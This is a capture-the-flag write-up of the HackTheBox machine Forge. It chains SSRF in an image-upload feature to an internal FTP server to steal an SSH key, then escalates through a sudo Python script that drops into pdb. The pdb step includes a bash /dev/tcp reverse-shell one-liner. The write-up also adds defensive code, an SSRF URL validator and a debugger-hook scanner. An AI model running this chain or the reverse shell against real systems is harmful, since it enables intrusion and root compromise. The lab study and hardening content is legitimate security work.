Forge - HTB Writeup

2022-01-13

background

Forge

Hello everyone, this is a write-up of a HackTheBox machine that I did recently. Enjoy it.

Recon

First we add the following entry to /etc/hosts:

10.10.11.111    forge.htb

We start with the usual full port scan:

nmap -p- -sCV -oN nmap/initial -T5 --min-rate=5000 forge.htb

Two ports are open: 22 (SSH) and 80 (an Apache HTTP server).

We then dig into the web server: directory brute-forcing, virtual-host discovery and some general fuzzing.

For directories I use gobuster, and for vhosts I use ffuf.

The vhost scan turns up something interesting, aXXXX.forge.htb, which we also add to /etc/hosts.

Unfortunately that vhost only accepts connections from localhost, so we cannot browse it directly from our machine.

Directory scanning does not give us many interesting URLs, so we move on to enumerating manually.

Browser enumeration

Browsing the main site we find a gallery page that lets us upload images, either as a file or by giving the server a URL to fetch the image from.

Server-side fetching of a user-supplied URL is the feature most likely to be exploitable, so we focus on it.

We submit a URL pointing at a listener on our own machine, and the server connects to it, confirming that the fetch is performed by the server.

This upload feature is vulnerable to Server-Side Request Forgery (SSRF).

In a Server-Side Request Forgery (SSRF) attack, the attacker abuses functionality on the server to read or update internal resources. The attacker supplies or modifies a URL that the server-side code will read from or submit data to; by carefully choosing URLs, the attacker may be able to read server configuration such as cloud (e.g. AWS) instance metadata, connect to internal services such as HTTP-enabled databases, or perform POST requests to internal services that were never meant to be exposed. Here it also lets us reach the localhost-only vhost, because the request originates from the server itself.

So we point the upload URL at http://aXXXX.forge.htb/ and read the fetched page back through the upload link. Its nav bar has a link to /announcements.

Fetching /announcements the same way gives us some interesting information:

<!DOCTYPE html>
<html>
<head>
    <title>Announcements</title>
</head>
<body>
    <link rel="stylesheet" type="text/css" href="/static/css/main.css">
    <link rel="stylesheet" type="text/css" href="/static/css/announcements.css">
    <header>
            <nav>
                <h1 class=""><a href="/">Portal home</a></h1>
                <h1 class="align-right margin-right"><a href="/announcements">Announcements</a></h1>
                <h1 class="align-right"><a href="/upload">Upload image</a></h1>
            </nav>
    </header>
    <br><br><br>
    <ul>
        <li>An internal ftp server has been setup with credentials as uXXX:XXX</li>
        <li>The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.</li>
        <li>The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=&lt;url&gt;.</li>
    </ul>

That gives us our first set of credentials, uXXX:XXX.

It also tells us that the internal /upload endpoint will itself fetch from ftp:// URLs passed via ?u=<url>. Chaining the two: we make the public upload feature fetch the internal vhost's /upload endpoint, and tell that endpoint to fetch from the FTP server with the leaked credentials.

Uploading http://aXXXX.forge.htb/upload?u=ftp://XXX:XXX@forge.htb and retrieving the result gave us:

curl http://forge.htb/uploads/F6Oo6LWADqGtlXe7ztB6
drwxr-xr-x    3 1000     1000         4096 Aug 04 19:23 snap
-rw-r-----    1 0        1000           33 Jan 05 05:54 user.txt

That listing (a snap directory and user.txt, which is group-readable by uid 1000) is the user's home directory, so the FTP server is rooted there. Requesting http://aXXXX.forge.htb/upload?u=ftp://XXX:XXX@FORGE.HTB/.ssh/id_rsa the same way

gives us the user's private SSH key, which we saved locally.
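The fetch feature abused above trusted the user's URL on three counts: the scheme (ftp:// was accepted), embedded credentials (user:pass@) and the destination (a name that resolved back to the box itself). The following is an added example, not the Forge application's code, of how such an image fetcher should validate a URL: allow only http/https on standard ports, reject userinfo, resolve the name and refuse any non-public address, and return the resolved IPs so the caller can pin them. The hostnames, the fake DNS table and the sample URLs are constructed for illustration.

```python
"""
Hardened validation for an "upload image from URL" feature.

Added example for this write-up; it is not the Forge application's code.
The allowed schemes/ports, the fake DNS table and the test URLs are all
assumptions constructed for illustration.
"""
import ipaddress
import socket
from urllib.parse import urlsplit


ALLOWED_SCHEMES = {"http", "https"}   # an image fetcher never needs ftp:// or ftps://
ALLOWED_PORTS = {80, 443}


class UnsafeURL(ValueError):
    """Raised when a user-supplied URL must not be fetched server-side."""


def system_resolver(host):
    """Resolve a hostname to the set of IP address strings (real DNS)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def validate_fetch_url(url, resolver=system_resolver):
    """
    Check a user-supplied URL before the server fetches it.

    Returns (hostname, frozenset_of_pinned_ips). The caller should connect
    to one of the returned IPs and send the hostname in the Host header,
    so a DNS answer that changes between check and fetch (rebinding) is
    not honoured.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {parts.scheme!r}")
    # user:pass@host is only useful for reaching services such as FTP
    # with credentials; refuse it outright.
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("credentials in URL are not allowed")
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        raise UnsafeURL("invalid port") from None
    if port not in ALLOWED_PORTS:
        raise UnsafeURL(f"port not allowed: {port}")
    # Decide on the resolved addresses, not on the hostname string: a
    # denylist of names is defeated by case changes, alternate spellings
    # or an attacker-controlled DNS name that points at 127.0.0.1.
    try:
        addrs = resolver(host)
    except OSError as exc:
        raise UnsafeURL(f"cannot resolve {host}: {exc}") from None
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        # is_global is False for loopback, RFC 1918, link-local (including
        # the 169.254.169.254 cloud metadata address) and other special ranges.
        if not ip.is_global:
            raise UnsafeURL(f"{host} resolves to non-public address {ip}")
    return host, frozenset(addrs)


def is_safe(url, resolver=system_resolver):
    """Boolean convenience wrapper around validate_fetch_url."""
    try:
        validate_fetch_url(url, resolver)
        return True
    except UnsafeURL:
        return False


# Constructed DNS table so the example runs offline; DNS names are
# case-insensitive, so the lookup lowercases the host.
FAKE_DNS = {
    "images.example.com": {"93.184.216.34"},
    "intranet.example.com": {"10.10.11.111"},   # the box's own address
    "localhost": {"127.0.0.1"},
}


def fake_resolver(host):
    try:
        return FAKE_DNS[host.lower()]
    except KeyError:
        raise OSError("no such host") from None


if __name__ == "__main__":
    samples = [
        "http://images.example.com/cat.png",
        "ftp://user:pass@intranet.example.com/.ssh/id_rsa",
        "http://INTRANET.example.com/upload?u=ftp://user:pass@localhost",
        "http://localhost/upload",
        "https://images.example.com:8443/cat.png",
    ]
    for u in samples:
        print(f"{'ALLOW' if is_safe(u, fake_resolver) else 'DENY ':5} {u}")
```

Two caveats when wiring this into a real fetcher: the same check must be applied to every redirect target (a public URL that 302s to http://127.0.0.1/ is the classic bypass), and the connection must go to one of the returned IPs rather than re-resolving the name, otherwise a short-TTL record can pass the check and then point at an internal address.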

With that key we can SSH in as the user and continue enumerating.

sudo -l

shows that we can run:

sudo /usr/bin/python3 /opt/remote-manage.py 

This is a small CLI admin tool: after you enter a password (which is hardcoded in the script 🙂) it presents a menu that can list processes, view memory usage and a few other things. The menu loop is wrapped in a try/except block, and the except handler drops into pdb. That means any input that raises an exception hands us an interactive debugger, and from pdb we can execute arbitrary Python, as root, since the script runs under sudo.

So instead of choosing one of the menu options 1 to 4, we enter 69; that raises an exception, we land in the except block and get a pdb prompt.

In there we can just write:

import os
# We could simply read the flag with os.system('cat /root/root.txt'),
# but that is boring. Instead, start a listener on the attacker machine
# (nc -lvnp 4444) and spawn a reverse shell from the pdb prompt:
os.system('bash -i >& /dev/tcp/10.10.14.4/4444 0>&1')
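The pattern behind this escalation is worth checking for in any script sudo lets you run: an except handler (or a stray breakpoint()) that hands an interactive prompt to whoever is at the terminal. Below is an added example, not code from this write-up or from /opt/remote-manage.py, of a small AST-based scanner that finds such hooks and flags the ones reachable by raising an exception. The SAMPLE_SCRIPT it runs on is constructed to mimic the try/except-into-pdb shape described above and is not the real script.

```python
"""
Audit helper: locate debugger entry points in a Python script.

Added example for this write-up; it is not the write-up's or the target
machine's code. SAMPLE_SCRIPT is constructed to mimic the pattern
described above (a menu wrapped in try/except whose handler drops into
pdb) and is not /opt/remote-manage.py.
"""
import ast

# (module, function) pairs that hand an interactive prompt to whoever is
# at the terminal; when the script runs under sudo, that prompt is root.
DEBUG_CALLS = {
    ("pdb", "set_trace"), ("pdb", "post_mortem"), ("pdb", "pm"),
    ("code", "interact"), ("IPython", "embed"),
}
DEBUG_MODULES = {module for module, _ in DEBUG_CALLS}
DEBUG_BUILTINS = {"breakpoint"}   # Python 3.7+ builtin, defaults to pdb


def find_debug_hooks(source, filename="<script>"):
    """
    Return a sorted list of (lineno, 'module.func', inside_except_handler)
    for every debugger call in `source`. The third field flags hooks that
    are reached by raising an exception, which is how the menu was escaped.
    """
    tree = ast.parse(source, filename)
    aliases = {}          # local name -> (module, attr or None)
    except_ranges = []    # (first line, last line) of each except handler
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in DEBUG_MODULES:
                    aliases[alias.asname or alias.name] = (alias.name, None)
        elif isinstance(node, ast.ImportFrom):
            if node.module in DEBUG_MODULES:
                for alias in node.names:
                    aliases[alias.asname or alias.name] = (node.module, alias.name)
        elif isinstance(node, ast.ExceptHandler):
            except_ranges.append((node.lineno, node.end_lineno))

    def inside_except(lineno):
        return any(start <= lineno <= end for start, end in except_ranges)

    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func, target = node.func, None
        if isinstance(func, ast.Name):
            if func.id in DEBUG_BUILTINS:
                target = func.id
            elif aliases.get(func.id) in DEBUG_CALLS:   # from pdb import set_trace [as x]
                target = ".".join(aliases[func.id])
        elif isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            module = aliases.get(func.value.id, (None, None))[0]   # import pdb [as x]
            if (module, func.attr) in DEBUG_CALLS:
                target = f"{module}.{func.attr}"
        if target:
            hits.append((node.lineno, target, inside_except(node.lineno)))
    return sorted(hits)


# Constructed sample: a menu whose error path lands in pdb. Any option
# other than 1 or 2 raises and reaches the except handler.
SAMPLE_SCRIPT = '''\
import pdb
from code import interact as shell

def menu():
    choice = int(input("Option: "))
    if choice == 1:
        print("listing processes")
    elif choice == 2:
        shell()                          # leftover interactive console
    else:
        raise ValueError("unknown option")

try:
    menu()
except Exception:
    pdb.post_mortem()                    # debugger left in production code
'''


if __name__ == "__main__":
    for lineno, hook, via_exception in find_debug_hooks(SAMPLE_SCRIPT):
        how = "reachable by raising an exception" if via_exception else "direct call"
        print(f"line {lineno}: {hook} ({how})")
```

Run it against the file named in sudo -l (read the source with open(path).read()); anything it reports is a root shell waiting for a typo, and the fix is to catch specific exceptions and remove the debugger call rather than to hide the menu behind a password.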

Aaaaand we are root :D

Concluding

The important and revealing data is censored because the machine is still active and the details cannot be disclosed; you have to get them yourself 😊

The machine is rated medium, but once you spot the SSRF and the chain through the internal vhost's /upload endpoint it is a piece of cake. Privilege escalation is also very direct and did not need much enumeration once we had a shell.